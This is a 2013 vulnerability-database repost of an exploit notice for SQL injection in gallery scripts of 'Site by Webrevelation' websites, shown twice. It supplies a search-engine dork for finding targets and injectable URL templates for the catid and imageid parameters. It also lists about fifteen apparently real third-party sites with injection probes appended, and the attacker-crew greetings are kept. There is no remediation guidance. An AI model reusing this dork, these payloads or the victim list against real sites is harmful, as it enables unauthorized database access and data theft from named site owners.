Site by Webrevelation SQL Injection Vulnerability

2013-05-06T00:00:00
ID SECURITYVULNS:DOC:29312
Type securityvulns
Reporter Securityvulns
Modified 2013-05-06T00:00:00

Description

=========================================================== Site by Webrevelation SQL Injection Vulnerability ===========================================================

:-----------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Site by Webrevelation SQL Injection Vulnerability : # Date : 03 May 2013 : # Author : X-Cisadane : # Vendor : www.webrevelation.com : # Version : All Versions : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US) : # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw :-----------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) : intext:"Site by Webrevelation"

Proof of Concept

http://[Site]/[Path]/gallery_images.php?catid=['SQLi] http://[Site]/[Path]/gallery_image.php?imageid=['SQLi] http://[Site]/[Path]/photogallery.php?catid=['SQLi] http://[Site]/[Path]/photo_categories.php?catid=['SQLi]

Example : http://brushbusters.net/html/gallery_images.php?catid='5 https://webserver.censara.org/html/gallery_images.php?catid='11 http://www.dentalonebs.com/html/gallery_images.php?catid='12 http://www.denikeministries.org/html/gallery_images.php?catid='0 http://www.scarytastesgood.com/m/gallery_images.php?catid='3 http://www.sjblinings.com/html/gallery_images.php?catid='1 http://www.budblakley.com/html/gallery_image.php?imageid='71 http://www.perfectionequipment.com/html/gallery_image.php?imageid='36 http://www.savannahbuilders.net/html/photogallery.php?catid='10 http://www.worshipvancouver.com/html/gallery_images.php?catid='7 http://www.stevebarnesnewhomes.com/html/gallery_images.php?catid='3 http://www.investinc.info/html/gallery_images.php?catid='4 http://www.oconnorslawn.com/html/gallery_images.php?catid=-10 http://www.lachiquemaison.com/html/gallery_images.php?catid='20 http://www.crookedoak.org/html/photo_categories.php?catid=-17

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!

attachment.txt

=========================================================== Site by Webrevelation SQL Injection Vulnerability ===========================================================

:-----------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Site by Webrevelation SQL Injection Vulnerability : # Date : 03 May 2013 : # Author : X-Cisadane : # Vendor : www.webrevelation.com : # Version : All Versions : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US) : # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw :-----------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) : intext:"Site by Webrevelation"

Proof of Concept

http://[Site]/[Path]/gallery_images.php?catid=['SQLi] http://[Site]/[Path]/gallery_image.php?imageid=['SQLi] http://[Site]/[Path]/photogallery.php?catid=['SQLi] http://[Site]/[Path]/photo_categories.php?catid=['SQLi]

Example : http://brushbusters.net/html/gallery_images.php?catid='5 https://webserver.censara.org/html/gallery_images.php?catid='11 http://www.dentalonebs.com/html/gallery_images.php?catid='12 http://www.denikeministries.org/html/gallery_images.php?catid='0 http://www.scarytastesgood.com/m/gallery_images.php?catid='3 http://www.sjblinings.com/html/gallery_images.php?catid='1 http://www.budblakley.com/html/gallery_image.php?imageid='71 http://www.perfectionequipment.com/html/gallery_image.php?imageid='36 http://www.savannahbuilders.net/html/photogallery.php?catid='10 http://www.worshipvancouver.com/html/gallery_images.php?catid='7 http://www.stevebarnesnewhomes.com/html/gallery_images.php?catid='3 http://www.investinc.info/html/gallery_images.php?catid='4 http://www.oconnorslawn.com/html/gallery_images.php?catid=-10 http://www.lachiquemaison.com/html/gallery_images.php?catid='20 http://www.crookedoak.org/html/photo_categories.php?catid=-17